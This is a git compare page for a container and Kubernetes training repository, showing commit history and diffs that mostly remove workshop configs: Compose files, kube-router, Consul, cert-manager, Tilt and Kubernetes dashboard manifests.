Compare commits


15 Commits

Author              SHA1        Message                                                           Date
Jerome Petazzoni    a4e21ffe4d  fix-redirects.sh: adding forced redirect                          2020-04-07 16:48:33 -05:00
Jérôme Petazzoni    ae140b24cb  Merge pull request #435 from joepvd/patch-1                       2019-02-27 21:10:21 +01:00
                                typo correction
Joep van Delft      ab87de9813  typo correction                                                   2019-02-27 20:41:10 +01:00
Jerome Petazzoni    53a416626e  Update WiFi + logistics                                           2018-12-17 01:43:45 -06:00
Jerome Petazzoni    8bf71b956f  Customize all the things                                          2018-12-16 05:46:32 -06:00
Jerome Petazzoni    2c445ca99b  Merge branch 'enixlogo' into decembre2018                         2018-12-16 05:26:07 -06:00
Jerome Petazzoni    2ba244839a  Merge branch 'consul-auto-join' into decembre2018                 2018-12-16 05:25:31 -06:00
Jerome Petazzoni    0b71bc8655  Merge branch 'improve-kubectl-config-context' into decembre2018   2018-12-16 05:25:12 -06:00
Jerome Petazzoni    949fdd7791  Merge branch 'explain-system-masters' into decembre2018           2018-12-16 05:24:59 -06:00
Jerome Petazzoni    5cf8b42fe9  Merge branch 'mention-kubectl-logs-bug' into decembre2018         2018-12-16 05:24:45 -06:00
Jerome Petazzoni    781ac48c5c  Merge branch 'bump-versions-to-1.13' into decembre2018            2018-12-16 05:23:57 -06:00
Jerome Petazzoni    1cf3849bbd  Merge branch 'static-pods' into decembre2018                      2018-12-16 05:23:47 -06:00
Jerome Petazzoni    c77960d77b  Merge branch 'rewrite-labels-and-selectors' into decembre2018     2018-12-16 05:23:35 -06:00
Jerome Petazzoni    f01bc2a7a9  Fix overlapsing slide number and pics                             2018-09-29 18:54:00 -05:00
Jerome Petazzoni    3eaa844c55  Add ENIX logo                                                     2018-09-08 07:49:38 -05:00
                                Warning: do not merge this branch to your content, otherwise you
                                will get the ENIX logo in the top right of all your decks
541 changed files with 6188 additions and 94798 deletions

.gitignore vendored
View File

@@ -1,24 +1,12 @@
*.pyc
*.swp
*~
prepare-vms/tags
prepare-vms/infra
prepare-vms/www
prepare-tf/.terraform*
prepare-tf/terraform.*
prepare-tf/stage2/*.tf
prepare-tf/stage2/kubeconfig.*
prepare-tf/stage2/.terraform*
prepare-tf/stage2/terraform.*
prepare-tf/stage2/externalips.*
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
node_modules
### macOS ###

View File

@@ -1,7 +1,5 @@
# Container Training
(Test for livecycle)
This repository (formerly known as `orchestration-workshop`)
contains materials (slides, scripts, demo app, and other
code samples) used for various workshops, tutorials, and
@@ -41,7 +39,7 @@ your own tutorials.
All these materials have been gathered in a single repository
because they have a few things in common:
- some [shared slides](slides/shared/) that are re-used
- some [common slides](slides/common/) that are re-used
(and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
Markdown source files;
@@ -201,7 +199,7 @@ this section is for you!
locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
prevent you from losing your place if you get disconnected from servers.
prevent you from loosing your place if you get disconnected from servers.
https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IP's.
- Forget to have fun and focus on your students!
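
A minimal sketch of the MOSH + tmux combo described above (not from this repo; user@node1 is a hypothetical host, and both tools must be installed on the client and the server):

    # Connect over UDP with mosh, then attach to (or create) a tmux
    # session named "training" so a dropped connection doesn't lose your place.
    mosh user@node1 -- tmux new-session -A -s training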

View File

@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout

View File

@@ -1,2 +0,0 @@
hostname frr
log stdout

View File

@@ -1,34 +0,0 @@
version: "3"
services:
bgpd:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr
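
A hedged usage sketch for the Compose file above, assuming it is saved as docker-compose.yaml in the current directory:

    # Fix the socket directory permissions, start the FRR daemons,
    # then run the one-shot vtysh service to dump the BGP table.
    docker-compose up -d chmod zebra bgpd
    docker-compose run --rm vtysh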

View File

@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-scheduler --master http://localhost:8080
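
One hypothetical way to handle the placeholder, per the reminder line embedded above (assumes the file is saved as docker-compose.yaml and that cluster number 99 is used):

    # Delete the reminder line, then replace the CLUSTER placeholder
    # with a cluster number, as the file itself instructs.
    sed -i -e '/Edit the CLUSTER placeholder/d' -e 's/CLUSTER/99/' docker-compose.yaml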

View File

@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
name: kube-router
namespace: kube-system
spec:
selector:
matchLabels:
k8s-app: kube-router
template:
metadata:
labels:
k8s-app: kube-router
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg

View File

@@ -1,31 +0,0 @@
# Note: hyperkube isn't available after Kubernetes 1.18.
# So we'll have to update this for Kubernetes 1.19!
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,67 +0,0 @@
# (1) Setting up a registry, and telling Tilt to use it.
# Tilt needs a registry to store images.
# The following manifest defines a Deployment to run a basic Docker registry,
# and a NodePort Service to access it. Using a NodePort means that we don't
# need to obtain a TLS certificate, because we will be accessing the registry
# through localhost.
k8s_yaml('../k8s/tilt-registry.yaml')
# Tell Tilt to use the registry that we just deployed instead of whatever
# is defined in our Kubernetes resources. Tilt will patch image names to
# use our registry.
default_registry('localhost:30555')
# Create a port forward so that we can access the registry from our local
# environment, too. Note that if you run Tilt directly from a Kubernetes node
# (which is not typical, but might happen in some lab/training environments)
# the following might cause an error because port 30555 is already taken.
k8s_resource(workload='tilt-registry', port_forwards='30555:5000')
# (2) Telling Tilt how to build and run our app.
# The following two lines will use the kubectl-build plugin
# to leverage buildkit and build the images in our Kubernetes
# cluster. This is not enabled by default, because it requires
# the plugin to be installed.
# See https://github.com/vmware-tanzu/buildkit-cli-for-kubectl
# for more information about this plugin.
#load('ext://kubectl_build', 'kubectl_build')
#docker_build = kubectl_build
# Our Kubernetes manifests use images 'dockercoins/...' so we tell Tilt
# how each of these images should be built. The first argument is the name
# of the image, the second argument is the directory containing the build
# context (i.e. the Dockerfile to build the image).
docker_build('dockercoins/hasher', 'hasher')
docker_build('dockercoins/rng', 'rng')
docker_build('dockercoins/webui', 'webui')
docker_build('dockercoins/worker', 'worker')
# The following manifest defines five Deployments and four Services for
# our application.
k8s_yaml('../k8s/dockercoins.yaml')
# (3) Finishing touches.
# The following line lets Tilt run with the default kubeadm cluster-admin context.
allow_k8s_contexts('kubernetes-admin@kubernetes')
# This will run an ngrok tunnel to expose Tilt to the outside world.
# This is intended to be used when Tilt runs on a remote machine.
local_resource(name='ngrok:tunnel', serve_cmd='ngrok http 10350')
# This will wait until the ngrok tunnel is up, and show its URL to the user.
# We send the output to /dev/tty so that it doesn't get intercepted by
# Tilt, and gets displayed to the user's terminal instead.
# Note: this assumes that the ngrok instance will be running on port 4040.
# If you have other ngrok instances running on the machine, this might not work.
local_resource(name='ngrok:showurl', cmd='''
while sleep 1; do
TUNNELS=$(curl -fsSL http://localhost:4040/api/tunnels | jq -r .tunnels[].public_url)
[ "$TUNNELS" ] && break
done
printf "\nYou should be able to connect to the Tilt UI with the following URL(s): %s\n" "$TUNNELS" >/dev/tty
'''
)
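
For context (an editorial sketch, not part of this diff): with a Tiltfile like the one above, the development loop is driven from the directory containing it:

    # Build the images, deploy the manifests, and serve the Tilt UI
    # (port 10350 by default, which is what the ngrok tunnel above assumes).
    tilt up
    # When finished, tear the resources back down.
    tilt down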

View File

@@ -1,6 +1,6 @@
FROM node:4-slim
RUN npm install express
RUN npm install redis@3
RUN npm install redis
COPY files/ /files/
COPY webui.js /
CMD ["node", "webui.js"]

View File

@@ -13,7 +13,7 @@
color: royalblue;
}
</style>
<script src="jquery-1.11.3.min.js"></script>
<script src="jquery.js"></script>
<script src="d3.min.js"></script>
<script src="rickshaw.min.js"></script>
<script>

dockercoins/webui/files/jquery.js vendored Symbolic link
View File

@@ -0,0 +1 @@
jquery-1.11.3.min.js

View File

@@ -2,14 +2,14 @@ version: "2"
services:
elasticsearch:
image: elasticsearch:2
image: elasticsearch
# If you need to access ES directly, just uncomment those lines.
#ports:
# - "9200:9200"
# - "9300:9300"
logstash:
image: logstash:2
image: logstash
command: |
-e '
input {
@@ -47,7 +47,7 @@ services:
- "12201:12201/udp"
kibana:
image: kibana:4
image: kibana
ports:
- "5601:5601"
environment:

View File

@@ -1,8 +0,0 @@
k8s_yaml(helm(
"./path-to-chart", name="blue",
values=[], # Example: ["./path/to/values.yaml"]
set=[
"image.repository=jpetazzo/color",
"image.tag=latest",
]
))

View File

@@ -1,16 +0,0 @@
apiVersion: apiserver.config.k8s.io/v1
kind: AdmissionConfiguration
plugins:
- name: PodSecurity
configuration:
apiVersion: pod-security.admission.config.k8s.io/v1alpha1
kind: PodSecurityConfiguration
defaults:
enforce: baseline
audit: baseline
warn: baseline
exemptions:
usernames:
- cluster-admin
namespaces:
- kube-system

View File

@@ -1,21 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
annotations:
traefik.ingress.kubernetes.io/service-weights: |
whatever: 90%
whatever-new: 10%
spec:
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 80
- path: /
backend:
serviceName: whatever-new
servicePort: 80

View File

@@ -1,36 +0,0 @@
kind: Service
apiVersion: v1
metadata:
name: certbot
spec:
ports:
- port: 80
protocol: TCP
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: certbot
spec:
rules:
- http:
paths:
- path: /.well-known/acme-challenge/
pathType: Prefix
backend:
service:
name: certbot
port:
number: 80
---
apiVersion: v1
kind: Endpoints
metadata:
name: certbot
subsets:
- addresses:
- ip: A.B.C.D
ports:
- port: 8000
protocol: TCP

View File

@@ -1,11 +0,0 @@
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
name: xyz.A.B.C.D.nip.io
spec:
secretName: xyz.A.B.C.D.nip.io
dnsNames:
- xyz.A.B.C.D.nip.io
issuerRef:
name: letsencrypt-staging
kind: ClusterIssuer

View File

@@ -1,18 +0,0 @@
apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
name: letsencrypt-staging
spec:
acme:
# Remember to update this if you use this manifest to obtain real certificates :)
email: hello@example.com
server: https://acme-staging-v02.api.letsencrypt.org/directory
# To use the production environment, use the following line instead:
#server: https://acme-v02.api.letsencrypt.org/directory
privateKeySecretRef:
name: issuer-letsencrypt-staging
solvers:
- http01:
ingress:
class: traefik

View File

@@ -1,18 +0,0 @@
# Note: apiextensions.k8s.io/v1beta1 is deprecated, and won't be served
# in Kubernetes 1.22 and later versions. This YAML manifest is here just
# for reference, but it's not intended to be used in modern trainings.
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
version: v1alpha1
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof

View File

@@ -1,21 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof

View File

@@ -1,37 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
required: [ spec ]
properties:
spec:
type: object
properties:
taste:
description: Subjective taste of that kind of coffee bean
type: string
required: [ taste ]
additionalPrinterColumns:
- jsonPath: .spec.taste
description: Subjective taste of that kind of coffee bean
name: Taste
type: string
- jsonPath: .metadata.creationTimestamp
name: Age
type: date
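
A quick sketch (not in the repo) of what the additionalPrinterColumns above buy you once the CRD and a few Coffee objects have been applied; the output layout is illustrative:

    # TASTE comes from .spec.taste, AGE from .metadata.creationTimestamp.
    kubectl get coffees
    # NAME      TASTE     AGE   (illustrative columns)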

View File

@@ -1,34 +0,0 @@
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: arabica
spec:
taste: strong
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: excelsa
spec:
taste: fruity
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: liberica
spec:
taste: smoky
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: robusta
spec:
taste: stronger
bitterness: high
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: java

View File

@@ -1,78 +0,0 @@
# Basic Consul cluster using Cloud Auto-Join.
# Caveats:
# - no actual persistence
# - scaling down to 1 will break the cluster
# - pods may be colocated
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"

View File

@@ -1,99 +0,0 @@
# Even better Consul cluster.
# That one uses a volumeClaimTemplate to achieve true persistence.
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
volumeMounts:
- name: data
mountPath: /consul/data
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command: [ "sh", "-c", "consul leave" ]

View File

@@ -1,17 +1,9 @@
# Better Consul cluster.
# There is still no actual persistence, but:
# - podAntiAffinity prevents pod colocation
# - cluster works when scaling down to 1 (thanks to the lifecycle hook)
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
kind: ClusterRole
metadata:
name: consul
labels:
app: consul
rules:
- apiGroups: [""]
resources:
@@ -21,16 +13,24 @@ rules:
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
kind: ClusterRoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
kind: ClusterRole
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
labels:
app: consul
---
apiVersion: v1
kind: Service
@@ -63,22 +63,20 @@ spec:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
image: "consul:1.4.0"
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-retry-join=provider=k8s label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
@@ -86,4 +84,7 @@ spec:
lifecycle:
preStop:
exec:
command: [ "sh", "-c", "consul leave" ]
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,504 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
---
# Source: kubernetes-dashboard/templates/serviceaccount.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/secret.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# kubernetes-dashboard-certs
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-certs
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-csrf
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-csrf
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-key-holder
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-key-holder
type: Opaque
---
# Source: kubernetes-dashboard/templates/configmap.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ConfigMap
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-settings
data:
---
# Source: kubernetes-dashboard/templates/clusterrole-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Metrics Scraper to get metrics from the Metrics server
- apiGroups: ["metrics.k8s.io"]
resources: ["pods", "nodes"]
verbs: ["get", "list", "watch"]
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/role.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster", "dashboard-metrics-scraper"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
verbs: ["get"]
---
# Source: kubernetes-dashboard/templates/rolebinding.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/service.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
